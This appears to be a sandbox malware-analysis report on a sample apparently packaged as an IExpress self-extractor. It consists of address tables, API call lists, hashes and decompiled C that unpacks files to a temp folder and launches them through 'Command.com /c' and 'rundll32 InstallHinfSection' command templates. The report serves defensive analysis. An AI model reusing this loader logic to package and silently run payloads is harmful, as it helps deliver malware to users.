                                                                                                                                                                                                        0x00a93d75
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93d8f
                                                                                                                                                                                                        0x00a93d96
                                                                                                                                                                                                        0x00a93d98
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93d98
                                                                                                                                                                                                        0x00a93c8f
                                                                                                                                                                                                        0x00a93c98
                                                                                                                                                                                                        0x00a93cf1
                                                                                                                                                                                                        0x00a93cf3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93cfe
                                                                                                                                                                                                        0x00a93d11
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93d11
                                                                                                                                                                                                        0x00a93c9c
                                                                                                                                                                                                        0x00a93ca5
                                                                                                                                                                                                        0x00a93ca7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93cad
                                                                                                                                                                                                        0x00a93cb2
                                                                                                                                                                                                        0x00a93cb7
                                                                                                                                                                                                        0x00a93cc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93ce8
                                                                                                                                                                                                        0x00a93cec
                                                                                                                                                                                                        0x00a93ced
                                                                                                                                                                                                        0x00a93ced
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93ce8
                                                                                                                                                                                                        0x00a93c9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93c9e
                                                                                                                                                                                                        0x00a93c56
                                                                                                                                                                                                        0x00a93d35
                                                                                                                                                                                                        0x00a93d35
                                                                                                                                                                                                        0x00a93d3c
                                                                                                                                                                                                        0x00a93d48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93d48
                                                                                                                                                                                                        0x00a93c03
                                                                                                                                                                                                        0x00a93be2
                                                                                                                                                                                                        0x00a93be7
                                                                                                                                                                                                        0x00a93bee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

APIs
• memset.MSVCRT ref: 00A93C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A93CDC
  • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
  • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
  • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
  • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
  • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
  • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A98C42), ref: 00A93D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A93E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00A98C42), ref: 00A93EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00A98C42), ref: 00A93F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00A98C42), ref: 00A93F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00A98C42), ref: 00A93F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A98C42), ref: 00A93F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A98C42), ref: 00A93F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A98C42), ref: 00A93FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$photo660
                                                                                                                                                                                                        • API String ID: 1032054927-3627123777
                                                                                                                                                                                                        • Opcode ID: f9ebc8c29cb3ce74ffb8c2c6320681afc5c364c2f4ad63f0601ff85e6f0b3ac7
                                                                                                                                                                                                        • Instruction ID: 329ec58fd67d68a3b081f72a266c866de9e183536ea3b6be266e8ce3fe89edf3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9ebc8c29cb3ce74ffb8c2c6320681afc5c364c2f4ad63f0601ff85e6f0b3ac7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2B1F472708301ABDF20DF688949B6B77F4EB89740F10092EFA95DA190DB74CD46CB96
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        [Figure: control-flow graph beginning at a91ae8; legend: Executed / Not Executed]
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00A91AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v527;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				char _v1552;
                                                                                                                                                                                                        				CHAR* _v1556;
                                                                                                                                                                                                        				int* _v1560;
                                                                                                                                                                                                        				CHAR** _v1564;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				CHAR* _t53;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				signed char _t65;
                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                        				unsigned int _t85;
                                                                                                                                                                                                        				CHAR* _t90;
                                                                                                                                                                                                        				CHAR* _t92;
                                                                                                                                                                                                        				char _t105;
                                                                                                                                                                                                        				char _t106;
                                                                                                                                                                                                        				CHAR** _t111;
                                                                                                                                                                                                        				CHAR* _t115;
                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                        				CHAR* _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				intOrPtr* _t146;
                                                                                                                                                                                                        				char* _t148;
                                                                                                                                                                                                        				CHAR* _t151;
                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                        				CHAR* _t155;
                                                                                                                                                                                                        				CHAR* _t156;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t48 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                        				_t108 = __ecx;
                                                                                                                                                                                                        				_v1564 = _a4;
                                                                                                                                                                                                        				_v1560 = _a8;
                                                                                                                                                                                                        				E00A91680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                        				if(_v528 != 0x22) {
                                                                                                                                                                                                        					_t135 = " ";
                                                                                                                                                                                                        					_t53 =  &_v528;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t135 = "\"";
                                                                                                                                                                                                        					_t53 =  &_v527;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t111 =  &_v1556;
                                                                                                                                                                                                        				_v1556 = _t53;
                                                                                                                                                                                                        				_t54 = E00A91A84(_t111, _t135);
                                                                                                                                                                                                        				_t156 = _v1556;
                                                                                                                                                                                                        				_t151 = _t54;
                                                                                                                                                                                                        				if(_t156 == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_push(_t111);
                                                                                                                                                                                                        					E00A91781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        					E00A9658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t132 = _t156;
                                                                                                                                                                                                        					_t148 =  &(_t132[1]);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t105 =  *_t132;
                                                                                                                                                                                                        						_t132 =  &(_t132[1]);
                                                                                                                                                                                                        					} while (_t105 != 0);
                                                                                                                                                                                                        					_t111 = _t132 - _t148;
                                                                                                                                                                                                        					if(_t111 < 3) {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t106 = _t156[1];
                                                                                                                                                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						E00A91680( &_v268, 0x104, _t156);
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t138 = 0x2e;
                                                                                                                                                                                                        						_t57 = E00A966C8(_t156, _t138);
                                                                                                                                                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                        							_t139 = 0x2e;
                                                                                                                                                                                                        							_t115 = _t156;
                                                                                                                                                                                                        							_t58 = E00A966C8(_t115, _t139);
                                                                                                                                                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									goto L43;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                        									E00A91680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_push(_t115);
                                                                                                                                                                                                        									_t108 = 0x400;
                                                                                                                                                                                                        									E00A91781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                        										E00A916B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                        										E00A916B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = _t156;
                                                                                                                                                                                                        								 *_t156 = 0;
                                                                                                                                                                                                        								E00A92AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                        								goto L53;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t108 = "Command.com /c %s";
                                                                                                                                                                                                        								_t125 = "Command.com /c %s";
                                                                                                                                                                                                        								_t145 = _t125 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t76 =  *_t125;
                                                                                                                                                                                                        									_t125 = _t125 + 1;
                                                                                                                                                                                                        								} while (_t76 != 0);
                                                                                                                                                                                                        								_t126 = _t125 - _t145;
                                                                                                                                                                                                        								_t146 =  &_v268;
                                                                                                                                                                                                        								_t157 = _t146 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t77 =  *_t146;
                                                                                                                                                                                                        									_t146 = _t146 + 1;
                                                                                                                                                                                                        								} while (_t77 != 0);
                                                                                                                                                                                                        								_t140 = _t146 - _t157;
                                                                                                                                                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                        								if(_t156 != 0) {
                                                                                                                                                                                                        									E00A9171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                        									goto L53;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L43;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t140 = 0x525;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t60 =  &_v268;
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t140 = "[";
                                                                                                                                                                                                        								_v1556 = _t151;
                                                                                                                                                                                                        								_t90 = E00A91A84( &_v1556, "[");
                                                                                                                                                                                                        								if(_t90 != 0) {
                                                                                                                                                                                                        									if( *_t90 != 0) {
                                                                                                                                                                                                        										_v1556 = _t90;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "]";
                                                                                                                                                                                                        									E00A91A84( &_v1556, "]");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									L43:
                                                                                                                                                                                                        									_t60 = 0;
                                                                                                                                                                                                        									_t140 = 0x4b5;
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									L35:
                                                                                                                                                                                                        									_push(_t60);
                                                                                                                                                                                                        									E00A944B9(0, _t140);
                                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                                        									goto L54;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t155 = _v1556;
                                                                                                                                                                                                        									_t92 = _t155;
                                                                                                                                                                                                        									if( *_t155 == 0) {
                                                                                                                                                                                                        										_t92 = "DefaultInstall";
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									 *0xa99120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                        									 *_v1560 = 1;
                                                                                                                                                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa91140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                        										 *0xa99a34 =  *0xa99a34 & 0xfffffffb;
                                                                                                                                                                                                        										if( *0xa99a40 != 0) {
                                                                                                                                                                                                        											_t108 = "setupapi.dll";
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t108 = "setupx.dll";
                                                                                                                                                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push( &_v268);
                                                                                                                                                                                                        										_push(_t155);
                                                                                                                                                                                                        										E00A9171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *0xa99a34 =  *0xa99a34 | 0x00000004;
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										E00A91680(_t108, 0x104, _t155);
                                                                                                                                                                                                        										_t140 = 0x200;
                                                                                                                                                                                                        										E00A91680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L53:
                                                                                                                                                                                                        									_t62 = 1;
                                                                                                                                                                                                        									 *_v1564 = _t156;
                                                                                                                                                                                                        									L54:
                                                                                                                                                                                                        									_pop(_t152);
                                                                                                                                                                                                        									return E00A96CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}














































                                                                                                                                                                                                        0x00a91b61
                                                                                                                                                                                                        0x00a91b9f
                                                                                                                                                                                                        0x00a91b9f
                                                                                                                                                                                                        0x00a91bb1
                                                                                                                                                                                                        0x00a91bc2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91b63
                                                                                                                                                                                                        0x00a91b63
                                                                                                                                                                                                        0x00a91b65
                                                                                                                                                                                                        0x00a91b68
                                                                                                                                                                                                        0x00a91b68
                                                                                                                                                                                                        0x00a91b6a
                                                                                                                                                                                                        0x00a91b6b
                                                                                                                                                                                                        0x00a91b6f
                                                                                                                                                                                                        0x00a91b74
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91b76
                                                                                                                                                                                                        0x00a91b7b
                                                                                                                                                                                                        0x00a91b86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91b8c
                                                                                                                                                                                                        0x00a91b8c
                                                                                                                                                                                                        0x00a91b98
                                                                                                                                                                                                        0x00a91bc7
                                                                                                                                                                                                        0x00a91bc9
                                                                                                                                                                                                        0x00a91bcc
                                                                                                                                                                                                        0x00a91bd3
                                                                                                                                                                                                        0x00a91d75
                                                                                                                                                                                                        0x00a91d76
                                                                                                                                                                                                        0x00a91d78
                                                                                                                                                                                                        0x00a91d7f
                                                                                                                                                                                                        0x00a91e05
                                                                                                                                                                                                        0x00a91e09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91e12
                                                                                                                                                                                                        0x00a91e1b
                                                                                                                                                                                                        0x00a91e73
                                                                                                                                                                                                        0x00a91e21
                                                                                                                                                                                                        0x00a91e21
                                                                                                                                                                                                        0x00a91e28
                                                                                                                                                                                                        0x00a91e37
                                                                                                                                                                                                        0x00a91e3e
                                                                                                                                                                                                        0x00a91e52
                                                                                                                                                                                                        0x00a91e60
                                                                                                                                                                                                        0x00a91e60
                                                                                                                                                                                                        0x00a91e3e
                                                                                                                                                                                                        0x00a91e79
                                                                                                                                                                                                        0x00a91e7b
                                                                                                                                                                                                        0x00a91e84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91d9b
                                                                                                                                                                                                        0x00a91d9b
                                                                                                                                                                                                        0x00a91da0
                                                                                                                                                                                                        0x00a91da2
                                                                                                                                                                                                        0x00a91da5
                                                                                                                                                                                                        0x00a91da5
                                                                                                                                                                                                        0x00a91da7
                                                                                                                                                                                                        0x00a91da8
                                                                                                                                                                                                        0x00a91dac
                                                                                                                                                                                                        0x00a91dae
                                                                                                                                                                                                        0x00a91db4
                                                                                                                                                                                                        0x00a91db7
                                                                                                                                                                                                        0x00a91db7
                                                                                                                                                                                                        0x00a91db9
                                                                                                                                                                                                        0x00a91dba
                                                                                                                                                                                                        0x00a91dbe
                                                                                                                                                                                                        0x00a91dc3
                                                                                                                                                                                                        0x00a91dce
                                                                                                                                                                                                        0x00a91dd2
                                                                                                                                                                                                        0x00a91deb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91df0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91dd2
                                                                                                                                                                                                        0x00a91bf7
                                                                                                                                                                                                        0x00a91bfe
                                                                                                                                                                                                        0x00a91c07
                                                                                                                                                                                                        0x00a91d55
                                                                                                                                                                                                        0x00a91d5a
                                                                                                                                                                                                        0x00a91d5b
                                                                                                                                                                                                        0x00a91d5d
                                                                                                                                                                                                        0x00a91d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91c1b
                                                                                                                                                                                                        0x00a91c1b
                                                                                                                                                                                                        0x00a91c20
                                                                                                                                                                                                        0x00a91c2c
                                                                                                                                                                                                        0x00a91c33
                                                                                                                                                                                                        0x00a91c38
                                                                                                                                                                                                        0x00a91c3a
                                                                                                                                                                                                        0x00a91c3a
                                                                                                                                                                                                        0x00a91c40
                                                                                                                                                                                                        0x00a91c4b
                                                                                                                                                                                                        0x00a91c4b
                                                                                                                                                                                                        0x00a91c5d
                                                                                                                                                                                                        0x00a91c61
                                                                                                                                                                                                        0x00a91dd4
                                                                                                                                                                                                        0x00a91dd4
                                                                                                                                                                                                        0x00a91dd6
                                                                                                                                                                                                        0x00a91ddb
                                                                                                                                                                                                        0x00a91ddc
                                                                                                                                                                                                        0x00a91dde
                                                                                                                                                                                                        0x00a91d64
                                                                                                                                                                                                        0x00a91d64
                                                                                                                                                                                                        0x00a91d67
                                                                                                                                                                                                        0x00a91d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91c67
                                                                                                                                                                                                        0x00a91c67
                                                                                                                                                                                                        0x00a91c6d
                                                                                                                                                                                                        0x00a91c72
                                                                                                                                                                                                        0x00a91c74
                                                                                                                                                                                                        0x00a91c74
                                                                                                                                                                                                        0x00a91c8e
                                                                                                                                                                                                        0x00a91c99
                                                                                                                                                                                                        0x00a91cc0
                                                                                                                                                                                                        0x00a91cf8
                                                                                                                                                                                                        0x00a91d07
                                                                                                                                                                                                        0x00a91d23
                                                                                                                                                                                                        0x00a91d09
                                                                                                                                                                                                        0x00a91d14
                                                                                                                                                                                                        0x00a91d1b
                                                                                                                                                                                                        0x00a91d1b
                                                                                                                                                                                                        0x00a91d2b
                                                                                                                                                                                                        0x00a91d2d
                                                                                                                                                                                                        0x00a91d2d
                                                                                                                                                                                                        0x00a91d38
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A91BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A91BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A91C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00A91C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A91140,00000000,00000008,?), ref: 00A91CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00A91D1B
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-3368923722
                                                                                                                                                                                                        • Opcode ID: 8d25754929aeedff1ebb02f4d78229649ec1df0b82b6118ea4c2d8ff986a068a
                                                                                                                                                                                                        • Instruction ID: d4cba36836da309a0e1db60ab8d05c45a98a424b864731fc4b1fd5f4c4a35f0c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d25754929aeedff1ebb02f4d78229649ec1df0b82b6118ea4c2d8ff986a068a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59A13670B0021A6BEF20DB24CC45BFA77E9EB55310F24079AE555A72D0EFB08E86CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 324 a9597d-a959b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a959bb-a959d8 call a944b9 call a96285 324->325 326 a959dd-a95a1b GetDiskFreeSpaceA 324->326 343 a95c05-a95c14 call a96ce0 325->343 328 a95ba1-a95bde memset call a96285 GetLastError FormatMessageA 326->328 329 a95a21-a95a4a MulDiv 326->329 339 a95be3-a95bfc call a944b9 SetCurrentDirectoryA 328->339 329->328 332 a95a50-a95a6c GetVolumeInformationA 329->332 335 a95a6e-a95ab0 memset call a96285 GetLastError FormatMessageA 332->335 336 a95ab5-a95aca SetCurrentDirectoryA 332->336 335->339 337 a95acc-a95ad1 336->337 341 a95ad3-a95ad8 337->341 342 a95ae2-a95ae4 337->342 351 a95c02 339->351 341->342 347 a95ada-a95ae0 341->347 349 a95ae7-a95af8 342->349 350 a95ae6 342->350 347->337 347->342 353 a95af9-a95afb 349->353 350->349 354 a95c04 351->354 355 a95afd-a95b03 353->355 356 a95b05-a95b08 353->356 354->343 355->353 355->356 357 a95b0a-a95b1b call a944b9 356->357 358 a95b20-a95b27 356->358 357->351 360 a95b29-a95b33 358->360 361 a95b52-a95b5b 358->361 360->361 364 a95b35-a95b50 360->364 362 a95b62-a95b6d 361->362 365 a95b6f-a95b74 362->365 366 a95b76-a95b7d 362->366 364->362 367 a95b85 365->367 368 a95b7f-a95b81 366->368 369 a95b83 366->369 370 a95b87-a95b94 call a9268b 367->370 371 a95b96-a95b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E00A9597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                        				long _v792;
                                                                                                                                                                                                        				long _v796;
                                                                                                                                                                                                        				long _v800;
                                                                                                                                                                                                        				signed int _v804;
                                                                                                                                                                                                        				long _v808;
                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                        				long _v816;
                                                                                                                                                                                                        				long _v820;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                        				signed short _t78;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				int _t102;
                                                                                                                                                                                                        				unsigned int _t103;
                                                                                                                                                                                                        				unsigned int _t105;
                                                                                                                                                                                                        				signed int _t111;
